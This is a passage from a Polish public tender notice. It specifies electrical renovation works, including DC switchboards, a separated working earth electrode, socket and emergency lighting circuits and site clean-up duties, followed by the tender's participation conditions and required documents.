Układanie w rurach ochronnych,  giętkich przewodów jednożyłowych w izolacji z poliwinitu ciepłoodpornego, typ  H07V2-K (LgYc) 450/750V 120mm w trzech kolorach izolacji: czerwony, czarny i niebieski. Rury ochronne w tych samych kolorach. Przewody te zasilają trzy rozdzielnie pomocnicze prądu stałego zlokalizowane :
-	2 w pomieszczeniu 14, stoły warsztatowe strona lewa i stoły warsztatowe strona prawa.
-	1 w pomieszczeniu nr 15 przy zespole zasilającym.

Każda rozdzielnia wyposażona jest w: 
Pole zasilające:
	wyłącznik kompaktowy mocy 3P 100A 250V DC, wyzwalacze FMU: zwarciowy i termiczny, dostosowane do ochrony sieci DC, max prąd wyłączalny DC 42kA.
Pola odpływowe: 
zasilanie stołów warsztatowych,  wyposażone w następujące zabezpieczenia:
	rozłącznik izolacyjny , wyłącznik FOTTON SISO 32A 600V, ilość 5 szt.
Rozłączniki umieszczone na elewacji drzwiczek rozdzielni.
	rozłącznik bezpiecznikowy FOTTON RF 10 PV 25A 1000V DC - ilość 5 szt.
	woltomierz tablicowy napięcia  stałego, zakres 30V DC, ilość 1 szt.
	amperomierz bocznikowy tablicowy prądu stałego, zakres 100A, ilość 1 szt.
Mierniki umieszczone na elewacji drzwiczek rozdzielni.
Rozdzielnie opisane i odpowiednio oznakowane. 
	zasilanie stołów - przewody jednożyłowe giętkie  typ H07V2-K ( LgYc) 450/750V 35mm, trzy odcinki w izolacji czerwonej, czarnej i niebieskiej, ułożone we wspólnej giętkiej rurze ochronnej, dwuściennej, wzmocnionej. 
              
       
Pomieszczenie nr 14.
	rozebranie podłogi wraz z wszystkimi warstwami do poziomu podłoża gruntowego,
	rozbiórka całości ścianek oddzielających pomieszczenie socjalne i szatnie od pomieszczenia oraz ścianki z przejściem dzielącej pomieszczenie nr 14 na część mniejszą i większą,
	po rozbiórce ścianek tworzy się jedno pomieszczenie oznaczane jako nr 14,
	wykonać pomiary wysokościowe i ustalić poziom posadzki jednolity na całej powierzchni pomieszczenia uwzględniając poziom posadzki technicznej w sąsiadującym pomieszczeniu nr 15 (również podlega wymianie p. punkt poniżej),
Wykonanie uziomu roboczego bezszumowego:
	w podłożu gruntowym wykonać wykopy o głębokości 0,7m i szerokości 0,4m pod ułożenie separowanego poziomego uziomu roboczego bezszumowego ( płaskownik FeZn 50 x 4mm), kratowego, o rezystancji stabilizowanej uziomami pionowymi,  wykonanymi typowymi uziomami prętowymi FeZn, skręcanymi o średnicy 22mm i długości  l=4m każdy. 
	Uziomy pionowe zagłębiane mechanicznie, zlokalizowane w węzłach krat. Łączna ilość uziomów pionowych - 12 szt. Łączenie uziomów poziomych i pionowych przez spawanie.  Spawy zabezpieczyć antykorozyjnie.
	Ułożyć w korytkach izolacyjnych na ścianie  cztery przewody uziomowe  zakończone złączami kontrolno-pomiarowymi  umieszczonymi  na wysokości 0,7m, przeznaczonymi do kontroli rezystancji uziemienia roboczego  i do połączenia z natynkowym izolowanym ciągiem poziomym umieszczonym w korytkach PCV na uchwytach ściennych. 
Złącza pomiarowe umieszczone w trwale opisanych skrzynkach pomiarowych.
	Po ukończeniu montażu uziomu kratowego, wykonać dokumentację powykonawczą fotograficzną i graficzną. Wykopy zasypać oczyszczonym gruntem rodzimym z zagęszczaniem warstwami co 0,3m.
	Po zasypaniu wykopów wykonać pomiary kontrolne rezystancji uziemienia roboczego. Sporządzić protokół z pomiarów i dołączyć do dokumentacji powykonawczej.
Wykonany uziom jest uziomem bezszumowym, separowanym, połączonym przez dwa                   iskiernik separacyjne typu TFS 100kA, 2,5kV AC 50Hz z głównym uziomem ochronnym budynku w złączu kablowym z szyną PEN stanowiącą uziemiony punkt rozdziału systemów i w  rozdzielni głównej RG-1 z szyną PE.
Natynkowa, izolowana,  część uziomu roboczego wykonana płaskownikiem FeZn 50 x 4 i  odpowiednio oznakowana, wyprowadzona na ściany pomieszczeń nr 14 i nr 15 w miejscach  uzgodnionych z użytkownikiem. 
UWAGA! Jest to uziom separowany -  roboczy, przeznaczony wyłącznie do prac remontowych urządzeń łączności,  dlatego nie wolno do niego podłączać bezpośrednio urządzeń i elementów przewodzących  konstrukcji budynku  chronionych głównym uziomem wyrównawczym.
Aby uniknąć przypadkowych połączeń część natynkowa uziomu roboczego zostanie ułożona w osłonie izolacyjnej np. w oznakowanym korytku kablowym 60 x 40 PCV.
Na rysunku nr 9 przedstawiono schematycznie proponowane  rozwiązanie części podziemnej i części natynkowej uziomu separowanego.
Montaż 12 obwodów zasilających gniazda wtykowe jednofazowe, podtynkowe, 2 x 16A, 250V AC, 2P + PE.
Obwody gniazd wtykowych o nr 1 do 12, wyprowadzone są pojedynczo z rozdzielni RP-1. Wyposażenie jednego  pola stanowią:
wyłącznik jednofazowy 0-1, izolacyjny 25A 250V AC - 1 szt. ( łącznie 12 szt.)
UWAGA! Wyłączniki umieszczone w kasetach p/t przy gniazdach wtykowych podwójnych p/t..
	wyłącznik różnicowoprądowy jednofazowy 25/0,03A AC - 1 szt. ( łącznie 12 szt.)
	wyłącznik przeciążeniowo-nadprądowy jednofazowy C 25- 1 szt. ( łącznie 12 szt.)     Zasilanie gniazd przewodem typ YdY żo 450/750V 3 x 2,5mm,  ułożonym w korytkach kablowych stalowych, perforowanych, ocynkowanych nad sufitem podwieszanym i podtynkowo w rurkach karbowanych niepalnych , odcinki od sufitu podwieszanego do wyłącznika i gniazda ( rys. nr 5)
Obwody oświetlenia podstawowego, awaryjnego i ewakuacyjnego (rys. nr 3, 4 i nr 10)
	obwód nr 1 - zasilanie 5 szt. opraw awaryjnych, jasnych, T5 4 x 24W PPAR LUX SILVER,  przesłona PLX-T lub SH, zasilanie ED, moduł awaryjny 3h AT, IP66.
       Zabezpieczenia fazy zasilania podstawowego i fazy stałej:
	wyłącznik podświetlany  10A 250V AC - ilość 1 szt. mocowanie na elewacji rozdzielni RP-1
	wyłącznik różnicowoprądowy jednofazowy 16/0,03A AC - 2 szt.
	wyłącznik przeciążeniowo-nadprądowy jednofazowy C 16 - 2 szt. 
	obwody nr 2 do 8 - zasilanie opraw awaryjnych, jasnych, T5 3 x 80W PPAR 
LUX SILVER,  przesłona PLX-T lub SH, zasilanie ED, moduł awaryjny 3h AT, IP66, oraz zasilanie opraw bez modułu awaryjnego T5 3 x 80W PPAR LUX SILVER,  przesłona PLX-T lub SH, zasilanie ED,IP66.

Zabezpieczenia fazy zasilania podstawowego i fazy stałej:
	wyłącznik podświetlany  10A 250V AC - ilość 1 szt. mocowanie na elewacji rozdzielni RP-1
	wyłącznik różnicowoprądowy jednofazowy 16/0,03A AC - 2 szt.
	wyłącznik przeciążeniowo-nadprądowy jednofazowy C 16 - 2 szt. 
	obwód nr 9  - zasilanie opraw oświetlenia ewakuacyjnego LED
Zabezpieczenia fazy zasilania podstawowego i fazy stałej:
	wyłącznik różnicowoprądowy jednofazowy 16/0,03A AC - 2 szt.
	wyłącznik przeciążeniowo-nadprądowy jednofazowy C 16 - 2 szt. 

Instalacja antenowa:
	montaż 2 kpl. uniwersalnych przepustów antenowych do dachów dwuspadowych typ MSD 85 z trzema  króćcami  i trzema rurami termokurczliwymi 12 - 28mm
	montaż elastycznych przepustów rurowych hermetycznych prostych lub syfonowych na odcinku : przepust MSD 85 na dachu - strop właściwy nad sufitem podwieszanym. 
Długość ok 2m.
Ilość 2 komplety.
       
       
         
Pomieszczenie nr 15:
	montaż rozdzielni RP-2 - opisana wyżej, pkt.1.1.3.
	montaż rozdzielni pomocniczej prądu stałego- opisana wyżej, pkt. 1.1.4
	montaż zespołu zasilania prądem stałym - opisane wyżej,  pkt 1.1.4.
	montaż opraw oświetlenia podstawowego:
Obwód nr 3 -  oprawy indukcyjne, nastropowe, prostokątne 120W, 230V AC,  odbłyśnik  aluminiowy, obudowa stalowa IP65. Oprawy mocowane do konstrukcji nośnej.
Obwody nr 1, 2 - doświetlenie boczne 
Oprawy przemysłowe, hermetyczne, świetlówkoweT5, odbłyśnik aluminiowy PPAR, 
2 x 80W T5, moduł awaryjny 3h AT, układ zapłonowy ED, klosz przeźroczysty PMMA, klipsy INOX.
Oprawy mocowane do pod kątem 45 na wysięgnikach skośnych, przykręconych do  koryt elektroinstalacyjnych stalowych, dwa obwody po cztery oprawy - wg rys. nr 10.
	obwód nr 1 - zasilanie 4 szt. opraw awaryjnych, jasnych,przemysłowych  T5 2 x 80W, polerowany odbłyśnik  PPAR, zasilanie ED, moduł awaryjny 3h AT, IP66.
Zabezpieczenia fazy zasilania podstawowego i fazy stałej:
	wyłącznik podświetlany  10A 250V AC - ilość 1 szt. mocowanie na elewacji rozdzielni RP-2
	wyłącznik różnicowoprądowy jednofazowy 16/0,03A AC - 2 szt.
	wyłącznik przeciążeniowo-nadprądowy jednofazowy C 16 - 2 szt. 
	obwód nr 2 - zasilanie 4 szt. opraw awaryjnych, jasnych, przemysłowych  T5 2 x 80W, polerowany odbłyśnik  PPAR, zasilanie ED, moduł awaryjny 3h AT, IP66.
Zabezpieczenia fazy zasilania podstawowego i fazy stałej:
	wyłącznik podświetlany  10A 250V AC - ilość 1 szt. mocowanie na elewacji rozdzielni RP-2
	wyłącznik różnicowoprądowy jednofazowy 16/0,03A AC - 2 szt.
	wyłącznik przeciążeniowo-nadprądowy jednofazowy C 16 - 2 szt. 
	obwód nr 3 - zasilanie 4 szt. opraw indukcyjnych, nastropowych, prostokątnych 120W, 230V,  polerowany odbłyśnik Nano, zasilanie ED, moduł awaryjny 3h AT, IP65, przesłona przeźroczysta SH lub PC
Zabezpieczenia fazy zasilania podstawowego i fazy stałej:
	wyłącznik podświetlany  10A 250V AC - ilość 1 szt. mocowanie na elewacji rozdzielni RP-2
	wyłącznik różnicowoprądowy jednofazowy 16/0,03A AC - 2 szt.
	wyłącznik przeciążeniowo-nadprądowy jednofazowy C 16 - 2 szt. 
Montaż zespołów gniazd jedno i trójfazowych z wyłącznikiem 0-1. - ilość 3 szt. 
Montaż w miejscach wskazanych przez użytkownika.

Zabezpieczenia  obwodów trójfazowych nr 1, 2, 3 wg rys. nr 8 :
	zabezpieczenie przeciążeniowo - nadprądowe S303 C50 - ilość 1 szt.
	zabezpieczenie różnicowoprądowe P303 50/0,03A AC - ilość 1 szt.
Zestaw gniazd  jedno i trójfazowych z wyłącznikiem 3P 63 - 100A, obudowa zestawu IP54, 
4 x 16A 250V AC 2P+PE, 2 x 16A 4P+PE 400V AC, 1 x 32A 4P + PE 400V AC, ilość 3kpl.
Zasilanie przewodem typ YdY żo 450/750V 5x10mm ułożonym w korytkach stalowych, ocynkowanych.

Obwód trójfazowy nr 4,  zasilanie zasilacza buforowego:
	zabezpieczenie przeciążeniowo - nadprądowe S303 C20 - ilość 1 szt.
	zabezpieczenie różnicowoprądowe P303 20/0,03A AC - ilość 1 szt.

Pomiary odbiorcze i sporządzenie pełnej dokumentacji powykonawczej w wersji graficznej, fotograficznej i opisowej.
   

Roboty wspólne dla wszystkich rodzajów robót:
	zabezpieczenie przed zabrudzeniem (podczas prowadzenia robót) posadzek i podłóg, okien, stolarki wewnętrznej, drzwi wejściowych, okuć, urządzeń sanitarnych, grzejników, rur, wyposażenia pomieszczeń, elementów elewacji, urządzeń zamontowanych na elewacji folią, zabezpieczenie elementów zagospodarowania terenu, drzew, krzewów, kwietników itp. wraz z niezwłocznym ich oczyszczeniem w przypadku zabrudzenia,
	złom (elementy stalowe, metalowe i z metali kolorowych) pozyskany z rozbiórek i demontaży, Wykonawca własnym transportem na własny koszt przeważy w obecności przedstawiciela zamawiającego i przewiezie do magazynu SOI Rzeszów mieszczące się przy ul. Konopnickiej w Rzeszowie, złoży we wskazanym miejscu oraz podpisze protokół przekazania,
	Wykonawca własnym transportem i na własny koszt wywiezienie z placu budowy oraz zutylizuje pozostałe materiały z rozbiórek, demontaży i odpady budowlane,
	Wykonawca własnym transportem i na własny koszt wywiezienie z placu budowy oraz zutylizuje odpady farb i innych środków używanych do robót malarskich, przygotowania powierzchni, tynku cienkowarstwowego, ,
	wywóz i utylizację odpadów jw. oraz rozliczenie złomu Wykonawca będzie dokonywał na bieżąco zgodnie z przepisami szczegółowymi,
	Użytkownik może wymagać natychmiastowego usunięcia odpadów i złomu z placu budowy oraz sprzątania otoczenia budynku w przypadkach wystąpienia takiej konieczności,
	zabezpieczenie środowiska przed wpływem w/w środków a w przypadku dopuszczenia do skażenia środowiska podjęcie akcji ratunkowej i zabezpieczającej,
	wykonanie tynku kat III na bruzdach z układanymi przewodami elektrycznymi oraz montaż urządzeń, osprzętu itp. wykonywany z obróbką osadzania,
	porządkowanie, sprzątanie, mycie po robotach renowacyjnych i remontowych, pomieszczeń budynków z usuwaniem uszkodzeń,
	po zakończeniu robót remontowych uporządkowanie terenu wokół budynków oraz użytkowanych przez Wykonawcę dróg dojazdowych i dojść, likwidacja magazynków podręcznych, ewentualnego zaplecza budowy i placów składowych, usunięcie powstałych szkód,
	splantowanie zniszczonych fragmentów trawników, wyrównanie powierzchni, przygotowanie terenu pod obsianie trawą, wysianie trawy z nawożeniem,
	przygotowanie kompletu materiałów odbiorowych oraz pisemne zgłoszenie zakończenia robót i gotowości do odbioru,
<br /><br /><b>II.5) Główny kod CPV: </b>45453000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 05/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa szczegółowych wymagań w powyższym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                 Zamawiający nie określa szczegółowych wymagań w powyższym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Określenie warunków: warunek w powyższym zakresie zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie zamówienia:  wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał w sposób należyty, w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 2 roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 150 tys. zł brutto (słownie: sto pięćdziesiąt tysięcy złotych) każda. UWAGA I: Za robotę budowlaną odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia należy rozumieć robotę budowlaną zrealizowaną w ramach jednej umowy, która swym zakresem obejmuje roboty ogólnobudowlane związane z konserwacją / remontem pomieszczeń na wartość co najmniej 150 tys. zł brutto każda. UWAGA II: Nie dopuszcza się sumowania wartości robót budowlanych zrealizowanych w ramach kilku umów w celu uzyskania progu wartościowego wyznaczonego przez Zamawiającego.  wykaże, że dysponuje lub będzie dysponował co najmniej: o 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia w charakterze kierownika budowy/robót w branży ogólnobudowlanej, posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U z 2016 r., poz. 290) oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2014 r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U z 2016 r., poz. 65), lub zamierzającymi świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. 2014r. poz. 1946) w specjalności konstrukcyjno- budowlanej.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. W celu wstępnego wykazania braku podstaw do wykluczenia, o których mowa w art. 24 ust. 1 oraz 24 ust. 5 ustawy Pzp Zamawiający wymaga złożenia wraz z ofertą oświadczenia  wg wzoru stanowiącego Załącznik nr 2 do SIWZ 2. Wykonawca, w terminie 3 dni od dnia przekazania informacji, o której mowa w art. 86 ust. 5, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 (Załącznik nr 6 do SIWZ). Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 3. Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących dokumentów potwierdzających brak podstaw do wykluczenia Wykonawcy z postępowania: 1) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 2) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. W celu wstępnego wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1b Pzp Zamawiający wymaga złożenia wraz z ofertą oświadczenia  wg wzoru stanowiącego Załącznik nr 3 do SIWZ. 2. Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie dokumentów potwierdzających spełnienie na dzień składania ofert następujących warunków udziału w postępowaniu: 1) Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. Wzór Wykazu stanowi Załącznik nr 4 do SIWZ. 2) Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór Wykazu stanowi Załącznik nr 5 do SIWZ. 3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do niniejszego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. 4. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Wzór takiego zobowiązania stanowi Załącznik nr 7 do SIWZ. W przypadku powoływania się na zasoby podmiotu trzeciego w zakresie zdolności technicznej i zawodowej  Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, stosownego zobowiązania. 5. Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13-22 i ust. 5. 6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane, do realizacji których te zdolności są wymagane. 7. Jeżeli zdolności techniczne lub zawodowe lub sytuacja ekonomiczna lub finansowa, podmiotu nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego: 1) zastąpił ten podmiot innym podmiotem lub podmiotami lub 2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną, 8. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w składanych przez siebie oświadczeniach  Załączniki nr 2 i 3 do SIWZ. 9. Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu składa także oświadczenie  Załącznik nr 2 do SIWZ  dotyczące podwykonawców. 10. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie wg wzoru na Załączniku nr 2 i 3 do SIWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. 11. Wszelkie Oświadczenia (w tym Wykazy), o których mowa w niniejszej specyfikacji dotyczące Wykonawcy i innych podmiotów, na których zdolnościach lub sytuacji polega Wykonawca na zasadach określonych w art. 22a ustawy Pzp oraz dotyczące Podwykonawców, składane są w oryginale. Pozostałe dokumenty dotyczące wykazania braku podstaw do wykluczenia oraz spełnienia warunków udziału w postępowaniu, inne niż oświadczenia, składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem. 12. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo Podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. 13. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów. 14. Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających brak podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu, jeżeli Zamawiający posiada oświadczenia lub dokumenty dotyczące tego wykonawcy lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2014 r. poz. 1114 oraz z 2016 r. poz. 352). W takiej sytuacji wykonawca zobligowany jest do wskazania Zamawiającemu sygnatury postępowania, w którym wymagane dokumenty lub oświadczenia się znajdują. 15. Zamawiający może wykluczyć wykonawcę na każdym etapie postępowania o udzielenie zamówienia<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz ofertowy, dowód wniesienia wadium, ew. pełnomocnictwo w oryginale lub jako kopia notarialnie potwierdzona za zgodność z oryginałem.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
